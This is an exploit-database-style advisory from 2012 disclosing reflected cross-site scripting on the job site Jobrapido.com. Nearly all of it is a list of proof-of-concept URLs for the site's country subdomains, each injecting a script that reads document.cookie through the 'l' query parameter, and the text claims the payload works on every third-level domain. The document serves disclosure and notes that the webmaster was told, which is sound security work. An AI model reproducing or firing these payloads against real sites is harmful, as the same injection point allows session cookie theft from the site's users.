+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : Jobrapido.com Multiple XSS
# Date : 07-03-2012
# Author : Ivano Binetti (http://www.ivanobinetti.com)
# Web site : http://www.jobrapido.com
# Web master notification : 07/11/2011
+--------------------------------------------------------------------------------------------------------------------------------+
PoC:
http://us.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://uk.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://it.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://ae.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://ao.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://ar.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://at.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://au.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://be.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://br.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://ca.jobrapido.com/?w=security&l=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
This PoC works for all third-level domains.
+--------------------------------------------------------------------------------------------------------------------------------+